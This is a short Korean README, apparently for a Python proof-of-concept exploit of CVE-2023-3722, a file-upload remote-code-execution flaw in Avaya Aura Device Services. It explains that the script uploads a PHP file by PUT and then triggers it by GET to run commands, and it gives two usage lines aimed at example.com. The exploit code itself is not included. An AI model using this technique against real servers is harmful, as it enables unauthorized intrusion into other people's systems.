
CVE-2023-3722 Avaya Aura Device Services 무제한 파일 업로드 RCE용 Python POC
CVE-2023-3722 Avaya Aura Device Services 무제한 파일 업로드 RCE에 대한 Python POC입니다.
이 스크립트는 PUT 요청을 사용하여 8자리 무작위 생성 파일 이름으로 PHP 파일을 업로드합니다. 그런 다음 GET 요청을 통해 이 파일을 검색하고 출력을 파싱하여 명령 출력을 얻습니다.
python3 ./CVE-2023-3722.py example.com:444 --query "id"
python3 ./CVE-2023-3722.py example.com:444 --query "hostname"